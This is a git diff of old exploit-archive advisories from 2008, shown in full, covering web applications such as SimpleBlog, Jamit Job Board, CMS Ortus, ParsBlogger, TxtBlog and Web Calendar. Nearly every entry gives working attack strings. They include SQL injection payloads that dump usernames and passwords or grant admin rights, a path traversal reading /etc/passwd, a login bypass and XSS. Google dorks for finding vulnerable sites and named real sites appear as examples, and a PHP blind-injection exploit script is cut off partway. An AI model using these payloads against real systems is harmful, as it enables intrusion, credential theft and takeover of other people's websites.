+[»] ----------------------------------------------------------
+[»] Author : EL_MuHaMMeD
+[»]
+[»] Date : 26.11.2008
+[»]
+[»] Contact : cwelmuhammed@gmail.com
+[»]
+[»] -----------------------------------------------------------
+
+
+Script : SimpleBlog 3.0
+
+Download : http://www.8pixel.net/FetchFile.aspx?doc=simpleblog3.rar
+
+Dork : "inurl:simpleblog3"
+
+Our mdb path : db/simpleBlog.mdb
+
+Exploits :
+
+Step 1 - http://www.[target].com/[path]/simpleblog3/db/simpleBlog.mdb
+
+Step 2 - Download that mdb file and read admin name & pass from "users" table.
+
+Step 3 - http://www.[target].com/[path]/simpleblog3/admin/default.asp
+
+Example :
+
+http://www.bvrg.org.uk/simpleblog3/db/simpleBlog.mdb
+
+http://www.bvrg.org.uk/simpleblog3/admin/default.asp
+
+ 
+
+[»] ----------------------------------------------------------------------
+[»]
+[»] Cyber-Security.ORG - ELMuHaMMeD.COM
+[»]
+[»] ----------------------------------------------------------------------
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7234.txt b/platforms/php/webapps/7234.txt
index 9af8bce2d..723212efa 100755
--- a/platforms/php/webapps/7234.txt
+++ b/platforms/php/webapps/7234.txt
@@ -1,61 +1,61 @@
-***********************************************************************************************************************************************************        
-[!]                                                                                                                                                     [!]
-[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
-[!]                                 O    O            O                                 O      O                                                        [!]
-[!]                                 O                 O                                       O                                                         [!]
-[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
-[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
-[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
-[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
-[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
-[!]                                           OO                                                                                                        [!]
-[!]                                          OO                                                                                                         [!]
-[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
-[!]                                        OO            WwW.Exploiter5.CoM ; WwW.No-Exploit.CoM ; WwW.IQ-TY.CoM                                        [!]
-***********************************************************************************************************************************************************
-+----                                                        Bismi Allah Irahmani ArraHim                                                             ----+
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++                                                     [ Video Girls (type) Blind SQL Injection Vulnerability ]                                          ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-:   Author   : Cyber-Zone   ( Abdelkhalek)                                                                :       :                                       :
-¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
-¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
-¦   From     : MoroCCo                                                                                    ¦       ¦                                       ¦
-¦   Script   : http://www.videogirls.biz                                                                  ¦       ¦                ![ 4 ]!                ¦
-¦   Download : http://www.videogirls.biz/view.php?p=Invest                                                ¦       ¦                                       ¦
-¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
-¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
-¦                                                          From The Dark Side Of MoroCCo                                                                 ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-:                                                                                                                                                         :
-¦  Remember    :                                                                                                                                          ¦
-¦  -------------                                                                                                                                          ¦
-¦                                                                                                                                                         ¦
-¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
-¦                                                                                                                                                         ¦
-
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++              [!]  Fi Khater Mgharba wahed wahed , Kima tayGol Khoya JiKo , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!]          ++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-
-
-ExploiT :
-
-
-
-http://www.videogirls.biz/demo/view_snaps.php?type=2+and+substring(@@version,1,1)=5  ===> False
-
-http://www.videogirls.biz/demo/view_snaps.php?type=2+and+substring(@@version,1,1)=4  ===> True
-
-
-Spicail ( R07 T9awwad ) To str0ke & Milw0rM
-
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-+----                                                                  ThanX To                                                                       ----+
-++--------------------------------------------------------------------------------------------------------------------------------------------------------+
-++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
-+--------------------------------------------------------------------------------------------------------------------------------------------------------++
-=                                                                    [AttaCk Is CompLet]                                                                  =
-___________________________________________________________________________________________________________________________________________________________
-
-# milw0rm.com [2008-11-25]
+***********************************************************************************************************************************************************        
+[!]                                                                                                                                                     [!]
+[!]                                  OOOO             O                                 OOOOOOOOO                                                       [!]
+[!]                                 O    O            O                                 O      O                                                        [!]
+[!]                                 O                 O                                       O                                                         [!]
+[!]                                 O      OOOO  OOOO OOOOOO     OOOO   OOO OO               O      OOOO   OO OO     OOOO                               [!]
+[!]                                 O       OOO  OOO  O     O   O    O    OO  O             O      O    O   OO  O   O    O                              [!]
+[!]                                 O        OO  OO   O     O   OOOOOO    O     *******    O       O    O   O   O   OOOOOO                              [!]
+[!]                                 O    O    OOOO    O     O   O         O               O      O O    O   O   O   O                                   [!]
+[!]                                  OOOO      OO     OOOOOO     OOOO   OOOOOO           OOOOOOOOO  OOOO   OOO OOO   OOOO                               [!]
+[!]                                           OO                                                                                                        [!]
+[!]                                          OO                                                                                                         [!]
+[!]                                         OO                          Proud To Be MoroCCaN                                                            [!]
+[!]                                        OO            WwW.Exploiter5.CoM ; WwW.No-Exploit.CoM ; WwW.IQ-TY.CoM                                        [!]
+***********************************************************************************************************************************************************
++----                                                        Bismi Allah Irahmani ArraHim                                                             ----+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++                                                     [ Video Girls (type) Blind SQL Injection Vulnerability ]                                          ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+:   Author   : Cyber-Zone   ( Abdelkhalek)                                                                :       :                                       :
+¦   E-MaiL   : Paradis_des_fous[at]hotmail[dot]fr                                                         ¦       ¦                                       ¦
+¦   Home     : WwW.IQ-Ty.CoM                                                                              ¦       ¦         MySQL Version Is :            ¦
+¦   From     : MoroCCo                                                                                    ¦       ¦                                       ¦
+¦   Script   : http://www.videogirls.biz                                                                  ¦       ¦                ![ 4 ]!                ¦
+¦   Download : http://www.videogirls.biz/view.php?p=Invest                                                ¦       ¦                                       ¦
+¦   RisK     : High [¦¦¦¦¦¦¦¦]                                                                            ¦       ¦                                       ¦
+¦ --------------------------------------------------------------------------------------------------------+       +-------------------------------------- ¦
+¦                                                          From The Dark Side Of MoroCCo                                                                 ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+:                                                                                                                                                         :
+¦  Remember    :                                                                                                                                          ¦
+¦  -------------                                                                                                                                          ¦
+¦                                                                                                                                                         ¦
+¦  This information is only for educational purpose, Cyber-Zone will not bear responsibility for any damages.                                             ¦
+¦                                                                                                                                                         ¦
+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++              [!]  Fi Khater Mgharba wahed wahed , Kima tayGol Khoya JiKo , Ana Maghribi , Ana Arabi , Ana Muslim , Jib L3azz Awela K7azz [!]          ++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+
+
+ExploiT :
+
+
+
+http://www.videogirls.biz/demo/view_snaps.php?type=2+and+substring(@@version,1,1)=5  ===> False
+
+http://www.videogirls.biz/demo/view_snaps.php?type=2+and+substring(@@version,1,1)=4  ===> True
+
+
+Spicail ( R07 T9awwad ) To str0ke & Milw0rM
+
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
++----                                                                  ThanX To                                                                       ----+
+++--------------------------------------------------------------------------------------------------------------------------------------------------------+
+++[  $ Hussin X , $ StaCk , $ JIKO , $ The_5p3cTrum , $ BayHay , $ CraCKEr , $ Oujda-Lord , $ GeneraL , $ Force-Major , $ WaLid , $ Oujda & Figuig City ]++
++--------------------------------------------------------------------------------------------------------------------------------------------------------++
+=                                                                    [AttaCk Is CompLet]                                                                  =
+___________________________________________________________________________________________________________________________________________________________
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7235.txt b/platforms/php/webapps/7235.txt
index a4aaf432f..d61fa94e4 100755
--- a/platforms/php/webapps/7235.txt
+++ b/platforms/php/webapps/7235.txt
@@ -1,33 +1,33 @@
-[â– ]  Jamit Job Board v.3 (index.php show_emp) <= Blind $ql Injection
-
- 
->☻<
-
-> AuToR: XaDoS
-> Contact M&: xados [at] hotmail [dot] it
-> Site: www.securitycode.it
-> B§g: Blind $ql inJection
-> SIte vuln: http://www.jamit.com
-
->☻<
- 
- 
-[â– ] ExPL0iT:
- 
-|: http://www.example.com/index.php?show_emp=[sql] 
- 
- 
-[■] D£M0: 
- 
-|: http://www.jamit.com/jobs/index.php?show_emp=1%20and%20substring(@@version,1,1)=4 [NO°°]
- 
-|: http://www.jamit.com/jobs/index.php?show_emp=1%20and%20substring(@@version,1,1)=5 [y&$] 
- 
-(l00k at the end of the PaG&)
-
- 
-[â– ] Th4nKs:::::>
- 
-\> Str0ke </\> Thc(MarJuana) </\> WiLLiam S. Burroughs </\> LiLiTh (You Ar& Mi!nE!) </
-
-# milw0rm.com [2008-11-25]
+[â– ]  Jamit Job Board v.3 (index.php show_emp) <= Blind $ql Injection
+
+ 
+>☻<
+
+> AuToR: XaDoS
+> Contact M&: xados [at] hotmail [dot] it
+> Site: www.securitycode.it
+> B§g: Blind $ql inJection
+> SIte vuln: http://www.jamit.com
+
+>☻<
+ 
+ 
+[â– ] ExPL0iT:
+ 
+|: http://www.example.com/index.php?show_emp=[sql] 
+ 
+ 
+[■] D£M0: 
+ 
+|: http://www.jamit.com/jobs/index.php?show_emp=1%20and%20substring(@@version,1,1)=4 [NO°°]
+ 
+|: http://www.jamit.com/jobs/index.php?show_emp=1%20and%20substring(@@version,1,1)=5 [y&$] 
+ 
+(l00k at the end of the PaG&)
+
+ 
+[â– ] Th4nKs:::::>
+ 
+\> Str0ke </\> Thc(MarJuana) </\> WiLLiam S. Burroughs </\> LiLiTh (You Ar& Mi!nE!) </
+
+# milw0rm.com [2008-11-25]
diff --git a/platforms/php/webapps/7237.txt b/platforms/php/webapps/7237.txt
index f8f8b4d57..9c30a14b2 100755
--- a/platforms/php/webapps/7237.txt
+++ b/platforms/php/webapps/7237.txt
@@ -1,50 +1,50 @@
-Author: otmorozok428, http://forum.antichat.ru 
-
-Products: CMS Ortus 1.12, CMS Ortus 1.13
-
-Vendor: http://ortus.nirn.ru
-
-Download: http://ortus.nirn.ru/files/ortus1-12.zip, http://ortus.nirn.ru/files/ortus1-13.zip
-
-Dork (for ALL Versions of CMS Ortus): inurl:index.php?ortupg=
-
-
-
-SQL Injection Vulnerability in POST Form:
-
-http://www.site.com/index.php?mod=users_edit_pub
-
-"City" field: [SQL Injection]
-
-
-
-EXAMPLE:
-
-1. You need to register first
-
-   http://www.site.com/index.php?mod=users_add
-
-2. Authentication
-
-   http://www.site.com/index.php?mod=auth
-
-3. Edit user profile next
-
-   http://www.site.com/index.php?mod=users_edit_pub
-
-4. Exploit "City" field (receive admin rights)
-
-   MyCity', `group`='admin
-
-5. Login to admin area
-
-   http://www.site.com/auth.php
-
-
-
-
-You can see demo video here:
-
-http://depositfiles.com/files/h8sbwikey
-
-# milw0rm.com [2008-11-26]
+Author: otmorozok428, http://forum.antichat.ru 
+
+Products: CMS Ortus 1.12, CMS Ortus 1.13
+
+Vendor: http://ortus.nirn.ru
+
+Download: http://ortus.nirn.ru/files/ortus1-12.zip, http://ortus.nirn.ru/files/ortus1-13.zip
+
+Dork (for ALL Versions of CMS Ortus): inurl:index.php?ortupg=
+
+
+
+SQL Injection Vulnerability in POST Form:
+
+http://www.site.com/index.php?mod=users_edit_pub
+
+"City" field: [SQL Injection]
+
+
+
+EXAMPLE:
+
+1. You need to register first
+
+   http://www.site.com/index.php?mod=users_add
+
+2. Authentication
+
+   http://www.site.com/index.php?mod=auth
+
+3. Edit user profile next
+
+   http://www.site.com/index.php?mod=users_edit_pub
+
+4. Exploit "City" field (receive admin rights)
+
+   MyCity', `group`='admin
+
+5. Login to admin area
+
+   http://www.site.com/auth.php
+
+
+
+
+You can see demo video here:
+
+http://depositfiles.com/files/h8sbwikey
+
+# milw0rm.com [2008-11-26]
diff --git a/platforms/php/webapps/7238.txt b/platforms/php/webapps/7238.txt
index 346dab35a..316584225 100755
--- a/platforms/php/webapps/7238.txt
+++ b/platforms/php/webapps/7238.txt
@@ -1,36 +1,36 @@
-[â– ]  Post Affiliate Pro v.3 (index.php md) <= Blind $ql Injection
-
- 
->©<
-
-> AuToR: XaDoS
-> Contact M&: xados [at] hotmail [dot] it
-> B§g: Blind $ql inJection
-> SIte vuln: http://www.qualityunit.com/postaffiliatepro/
-
->©<
- 
- 
-[â– ] ExPL0iT:
- 
-|: http://www.example.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=[sql] 
- 
- [you must be merchants]
-
-[■] D£M0: 
- 
-|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [NO°°]
- 
-|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [y&$ ;-)] 
- 
-
- 
-[â– ] Th4nKs::
- 
-\> Str0ke </
-\> Joy Division </
-\> Teo Babbeo </
-\> Spud </
-\> Loooo Z00ooo00oo0 </  Lol ;-)
-
-# milw0rm.com [2008-11-26]
+[â– ]  Post Affiliate Pro v.3 (index.php md) <= Blind $ql Injection
+
+ 
+>©<
+
+> AuToR: XaDoS
+> Contact M&: xados [at] hotmail [dot] it
+> B§g: Blind $ql inJection
+> SIte vuln: http://www.qualityunit.com/postaffiliatepro/
+
+>©<
+ 
+ 
+[â– ] ExPL0iT:
+ 
+|: http://www.example.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=[sql] 
+ 
+ [you must be merchants]
+
+[■] D£M0: 
+ 
+|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [NO°°]
+ 
+|: http://www.demo.qualityunit.com/postaffiliatepro3/merchants/index.php?md=Affiliate_Merchants_Views_AffiliateManager&fromprofile=1&umprof_status=1 and substring(@@version,1,1)=5 [y&$ ;-)] 
+ 
+
+ 
+[â– ] Th4nKs::
+ 
+\> Str0ke </
+\> Joy Division </
+\> Teo Babbeo </
+\> Spud </
+\> Loooo Z00ooo00oo0 </  Lol ;-)
+
+# milw0rm.com [2008-11-26]
diff --git a/platforms/php/webapps/7239.txt b/platforms/php/webapps/7239.txt
index 1df9e9054..fe21a8a32 100755
--- a/platforms/php/webapps/7239.txt
+++ b/platforms/php/webapps/7239.txt
@@ -1,33 +1,33 @@
---------------------------------------------------------------------------------------------------------------------
-
-[~] Script   : ParsBlogger
-
-[~] Version  : >!<
-
-[~] Link       : http://www.parsblogger.com
-
-[~] Dork      : "Powered by ParsBlogger"
-
-[~] Author   : BorN To K!LL
-
-[~] TeaM     : Security Geeks [ Sec-Geeks.com ]
-
---------------------------------------------------------------------------------------------------------------------
-
-[~] Exploit :.
-
-site.ir/blog.asp?wr=[SQL]
-
-[~] Example :.
-
-site.ir/blog.asp?wr=-5+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13+from+writer--
-
---------------------------------------------------------------------------------------------------------------------
-
-[~] Greetings :.
-
-[ Đr ĦλCКΣΓ ] , [ SECURITY GΣΣKS ] , [ AsbMay's Group ] , [ w4ck1ng TeaM ] , [ darkc0de TeaM ] , [ Juba ] .. n all muslims
-
---------------------------------------------------------------------------------------------------------------------
-
-# milw0rm.com [2008-11-26]
+--------------------------------------------------------------------------------------------------------------------
+
+[~] Script   : ParsBlogger
+
+[~] Version  : >!<
+
+[~] Link       : http://www.parsblogger.com
+
+[~] Dork      : "Powered by ParsBlogger"
+
+[~] Author   : BorN To K!LL
+
+[~] TeaM     : Security Geeks [ Sec-Geeks.com ]
+
+--------------------------------------------------------------------------------------------------------------------
+
+[~] Exploit :.
+
+site.ir/blog.asp?wr=[SQL]
+
+[~] Example :.
+
+site.ir/blog.asp?wr=-5+union+all+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13+from+writer--
+
+--------------------------------------------------------------------------------------------------------------------
+
+[~] Greetings :.
+
+[ Đr ĦλCКΣΓ ] , [ SECURITY GΣΣKS ] , [ AsbMay's Group ] , [ w4ck1ng TeaM ] , [ darkc0de TeaM ] , [ Juba ] .. n all muslims
+
+--------------------------------------------------------------------------------------------------------------------
+
+# milw0rm.com [2008-11-26]
diff --git a/platforms/php/webapps/7240.txt b/platforms/php/webapps/7240.txt
index b4f49beb0..d5c747f01 100755
--- a/platforms/php/webapps/7240.txt
+++ b/platforms/php/webapps/7240.txt
@@ -1,68 +1,68 @@
-        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-        +                                                                    +
-        +            stararticles blind sql injection Vulnerability          +
-        +                                                                    +
-        +                      Discovered by b3hz4d                          +
-        +                                                                    +
-        +                      WwW.DeltaHacking.Net                          +
-        +                                                                    +
-        +                                                                    +
-        +                                                                    +
-        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-                                  
-
-                              APA Center of Yazd University   
-                                 (https://www.ircert.cc)    
-
-		
-AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
-DATE   : 26 nov 2008
-SITE   : WwW.DeltaHacking.Net
-CONTACT: behzad_sh_66@yahoo.com
-
-#####################################################
-
-APPLICATION   : stararticles
-DOWNLOAD(175$): http://cmsnx.com/psf/order.php?id=5
-VENDOR        : http://www.stararticles.com/
-DEMO          : http://www.kalptarudemos.com/demo/stararticle/
-DORK          : inurl:"article.download.php"
-
-#####################################################
-
-
-[+] vuln    : blind sql injection
-              
-              many of pages are vulnerable to blind sql injection:
-              
-              ./article.list.php
-
-              ./article.print.php
-              
-              ./article.comments.php
-
-              ./article.publisher.php
-              
-                    .
-                    .
-                    .
-
-[+] Exploit : 
-              true:
-               
-              http://www.kalptarudemos.com/demo/stararticle/article.download.php/1090%20and%20substring(@@version,1,1)=5
-              http://www.bigarticle.com/article.download.php?artid=36106%20and%20substring(@@version,1,1)=5
-             
-              false:
-              
-              http://www.kalptarudemos.com/demo/stararticle/article.download.php/1090%20and%20substring(@@version,1,1)=4
-              http://www.bigarticle.com/article.download.php?artid=36106%20and%20substring(@@version,1,1)=4
-
-
-##########################################################################################################
-
-# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #
-
-##########################################################################################################
-
-# milw0rm.com [2008-11-26]
+        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+        +                                                                    +
+        +            stararticles blind sql injection Vulnerability          +
+        +                                                                    +
+        +                      Discovered by b3hz4d                          +
+        +                                                                    +
+        +                      WwW.DeltaHacking.Net                          +
+        +                                                                    +
+        +                                                                    +
+        +                                                                    +
+        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
+                                  
+
+                              APA Center of Yazd University   
+                                 (https://www.ircert.cc)    
+
+		
+AUTHOR : b3hz4d (Seyed Behzad Shaghasemi)
+DATE   : 26 nov 2008
+SITE   : WwW.DeltaHacking.Net
+CONTACT: behzad_sh_66@yahoo.com
+
+#####################################################
+
+APPLICATION   : stararticles
+DOWNLOAD(175$): http://cmsnx.com/psf/order.php?id=5
+VENDOR        : http://www.stararticles.com/
+DEMO          : http://www.kalptarudemos.com/demo/stararticle/
+DORK          : inurl:"article.download.php"
+
+#####################################################
+
+
+[+] vuln    : blind sql injection
+              
+              many of pages are vulnerable to blind sql injection:
+              
+              ./article.list.php
+
+              ./article.print.php
+              
+              ./article.comments.php
+
+              ./article.publisher.php
+              
+                    .
+                    .
+                    .
+
+[+] Exploit : 
+              true:
+               
+              http://www.kalptarudemos.com/demo/stararticle/article.download.php/1090%20and%20substring(@@version,1,1)=5
+              http://www.bigarticle.com/article.download.php?artid=36106%20and%20substring(@@version,1,1)=5
+             
+              false:
+              
+              http://www.kalptarudemos.com/demo/stararticle/article.download.php/1090%20and%20substring(@@version,1,1)=4
+              http://www.bigarticle.com/article.download.php?artid=36106%20and%20substring(@@version,1,1)=4
+
+
+##########################################################################################################
+
+# Greetings: str0ke, Dr.Trojan, Cru3l.b0y, l0pht and all member in DeltaHacking.Net & Snoop-Security.Com #
+
+##########################################################################################################
+
+# milw0rm.com [2008-11-26]
diff --git a/platforms/php/webapps/7241.txt b/platforms/php/webapps/7241.txt
index 84467801b..7119da643 100755
--- a/platforms/php/webapps/7241.txt
+++ b/platforms/php/webapps/7241.txt
@@ -1,70 +1,70 @@
-============================================================
-  TxtBlog (index.php m) Local File Inclusion Vulnerability
-============================================================
-
-  ,--^----------,--------,-----,-------^--,
-  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
-  `+---------------------------^----------|
-    `\_,-------, _________________________|
-      / XXXXXX /`|     /
-     / XXXXXX /  `\   /
-    / XXXXXX /\______(
-   / XXXXXX /           
-  / XXXXXX /
- (________(             
-  `------'
-
-
-AUTHOR : CWH Underground
-DATE   : 27 November 2008
-SITE   : cwh.citec.us
-
-
-#####################################################
- APPLICATION : TxtBlog
- VERSION     : v.1.0 Alpha
- DOWNLOAD    : http://downloads.sourceforge.net/txtblogcms/txtblogcms-1.0a.zip
-#####################################################
-
---- Local File Inclusion ---
-
------------------------------
- Vulnerable File (index.php)
------------------------------
-
-function showMonth() {
-	global $config_date_format, $txtblog_body, $txtblog_title, $config_title;
-
-	$txtblog_body = "";
-	$txtblog_title = "$config_title - Archives";
-
-	$year = $_GET['y'];			
-	$month = $_GET['m'];				
-
-	$files = findFiles("data/$year/$month");	<<< BUG !!!!
-	
-	if (isset($files)) {
-	foreach ($files as $file) {
-				
-		include ("data/$year/$month/$file");	<<< BUG !!!!
-		$date_array = explode(" ",$date);
-		$date = date($config_date_format, mktime($date_array[0], $date_array[1], $date_array[2], $date_array[3], $date_array[4], $date_array[5]));
-		$txtblog_body .= "<span class='blog_title'>$title</span><br>\n<span class='blog_date'>$date</span><br>\n".bb2html($blog)."<br>\n<hr size='1'>\n";
-
-	}
-	}
-}
-
----------
- Exploit
----------
-
-[+] http://[Target]/[txtblogcms_path]/index.php?y=2005&m=01/../../../../../../../../etc/passwd%00
-
-
-#######################################################################################
-Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
-Special Thx : asylu3, str0ke, citec.us, milw0rm.com
-#######################################################################################
-
-# milw0rm.com [2008-11-27]
+============================================================
+  TxtBlog (index.php m) Local File Inclusion Vulnerability
+============================================================
+
+  ,--^----------,--------,-----,-------^--,
+  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
+  `+---------------------------^----------|
+    `\_,-------, _________________________|
+      / XXXXXX /`|     /
+     / XXXXXX /  `\   /
+    / XXXXXX /\______(
+   / XXXXXX /           
+  / XXXXXX /
+ (________(             
+  `------'
+
+
+AUTHOR : CWH Underground
+DATE   : 27 November 2008
+SITE   : cwh.citec.us
+
+
+#####################################################
+ APPLICATION : TxtBlog
+ VERSION     : v.1.0 Alpha
+ DOWNLOAD    : http://downloads.sourceforge.net/txtblogcms/txtblogcms-1.0a.zip
+#####################################################
+
+--- Local File Inclusion ---
+
+-----------------------------
+ Vulnerable File (index.php)
+-----------------------------
+
+function showMonth() {
+	global $config_date_format, $txtblog_body, $txtblog_title, $config_title;
+
+	$txtblog_body = "";
+	$txtblog_title = "$config_title - Archives";
+
+	$year = $_GET['y'];			
+	$month = $_GET['m'];				
+
+	$files = findFiles("data/$year/$month");	<<< BUG !!!!
+	
+	if (isset($files)) {
+	foreach ($files as $file) {
+				
+		include ("data/$year/$month/$file");	<<< BUG !!!!
+		$date_array = explode(" ",$date);
+		$date = date($config_date_format, mktime($date_array[0], $date_array[1], $date_array[2], $date_array[3], $date_array[4], $date_array[5]));
+		$txtblog_body .= "<span class='blog_title'>$title</span><br>\n<span class='blog_date'>$date</span><br>\n".bb2html($blog)."<br>\n<hr size='1'>\n";
+
+	}
+	}
+}
+
+---------
+ Exploit
+---------
+
+[+] http://[Target]/[txtblogcms_path]/index.php?y=2005&m=01/../../../../../../../../etc/passwd%00
+
+
+#######################################################################################
+Greetz      : ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos, Gdiupo, GnuKDE, JK
+Special Thx : asylu3, str0ke, citec.us, milw0rm.com
+#######################################################################################
+
+# milw0rm.com [2008-11-27]
diff --git a/platforms/php/webapps/7242.txt b/platforms/php/webapps/7242.txt
index 0a20e2eec..075c2bb1f 100755
--- a/platforms/php/webapps/7242.txt
+++ b/platforms/php/webapps/7242.txt
@@ -1,39 +1,39 @@
-000000  00000     0000    0000  000  00 000000  0000000   0000  000000  00000
- 0    0   0      0    0  0    0  0   0   0    0  0    0  0    0  0    0  0   0
- 0    0   0     0  00 0 0        0  0    0    0  0      0  00 0  0    0  0    0
- 0    0   0     0 0 0 0 0        0  0    0    0  0  0   0 0 0 0  0    0  0    0
- 00000    0     0 0 0 0 0        0 0     00000   0000   0 0 0 0  00000   0    0
- 0    0   0     0 0 0 0 0        000     0    0  0  0   0 0 0 0  0  0    0    0
- 0    0   0     0  000  0        0  0    0    0  0      0  000   0  0    0    0
- 0    0   0   0  0       0    0  0   0   0    0  0    0  0       0   0   0   0
-000000  0000000   000     0000  000  00 000000  0000000   000   000  00 00000
-
-
-
-[+] Script               : Web Calendar System v 3.12/3.30
-
-[+] Exploit Type         : Multiple Exploits (XSS + remote bypass Exploit)
-
-[+] Google Dork          : intitle:Web Calendar system v 3.30        inurl:.asp
-[+] Google Dork          : intitle:Web Calendar system v 3.12        inurl:.asp
-
-[+] Contact              : blackbeard-sql@hotmail.fr
-
-
---//--> Exploit : 
-
-1) Remote Bypass Exploit :
-
-http://[website]/[script]/db/agenda/calendar.asp?DoAction=USER&Change=LOGINFORM
-
-username:' or '1'='1
-
-password:' or '1'='1
-
-2) Remote XSS exploit : 
-
-In simple words :
-
-http://[website]/[script]/CALENDAR.ASP?DoAction=Calendar&View=Search&SText=<script>alert('Bl@ckbe@rD is not dead yet')</script>[Peace xD ]
-
-# milw0rm.com [2008-11-27]
+000000  00000     0000    0000  000  00 000000  0000000   0000  000000  00000
+ 0    0   0      0    0  0    0  0   0   0    0  0    0  0    0  0    0  0   0
+ 0    0   0     0  00 0 0        0  0    0    0  0      0  00 0  0    0  0    0
+ 0    0   0     0 0 0 0 0        0  0    0    0  0  0   0 0 0 0  0    0  0    0
+ 00000    0     0 0 0 0 0        0 0     00000   0000   0 0 0 0  00000   0    0
+ 0    0   0     0 0 0 0 0        000     0    0  0  0   0 0 0 0  0  0    0    0
+ 0    0   0     0  000  0        0  0    0    0  0      0  000   0  0    0    0
+ 0    0   0   0  0       0    0  0   0   0    0  0    0  0       0   0   0   0
+000000  0000000   000     0000  000  00 000000  0000000   000   000  00 00000
+
+
+
+[+] Script               : Web Calendar System v 3.12/3.30
+
+[+] Exploit Type         : Multiple Exploits (XSS + remote bypass Exploit)
+
+[+] Google Dork          : intitle:Web Calendar system v 3.30        inurl:.asp
+[+] Google Dork          : intitle:Web Calendar system v 3.12        inurl:.asp
+
+[+] Contact              : blackbeard-sql@hotmail.fr
+
+
+--//--> Exploit : 
+
+1) Remote Bypass Exploit :
+
+http://[website]/[script]/db/agenda/calendar.asp?DoAction=USER&Change=LOGINFORM
+
+username:' or '1'='1
+
+password:' or '1'='1
+
+2) Remote XSS exploit : 
+
+In simple words :
+
+http://[website]/[script]/CALENDAR.ASP?DoAction=Calendar&View=Search&SText=<script>alert('Bl@ckbe@rD is not dead yet')</script>[Peace xD ]
+
+# milw0rm.com [2008-11-27]
diff --git a/platforms/php/webapps/7243.php b/platforms/php/webapps/7243.php
index 8da70dd27..315b2fe2b 100755
--- a/platforms/php/webapps/7243.php
+++ b/platforms/php/webapps/7243.php
@@ -1,60 +1,60 @@
-<?php
-	/*         ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-        +                                                                               +
-        +            stararticles blind sql injection Vulnerability  xpl         +
-        ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
-AUTHOR : Mountassif Moad
-DATE   : 26 nov 2008
-#####################################################
-APPLICATION   : stararticles
-DOWNLOAD(175$): http://cmsnx.com/psf/order.php?id=5
-VENDOR        : http://www.stararticles.com/
-DEMO          : http://www.kalptarudemos.com/demo/stararticle/
-DORK          : inurl:"article.download.php"
-#####################################################
- */
-
-#
-ini_set("max_execution_time",0);
-print_r('
-###############################################################
-#         stararticles Blind SQL Injection Exploit 
-#php '.$argv[0].' "http://www.site.com/article.download.php?artid=36106" 1
-#                                                         
-###############################################################
-');
-if ($argc > 1) {
-$url = $argv[1];
-if ($argc < 3) {
-$userid = 1;
-} else {
-$userid = $argv[2];
-}
-$r = strlen(file_get_contents($url."+and+1=1"));
-echo "\nExploiting:\n";
-$w = strlen(file_get_contents($url."+and+1=0"));
-$t = abs((100-($w/$r*100)));
-echo "\nPassword: ";
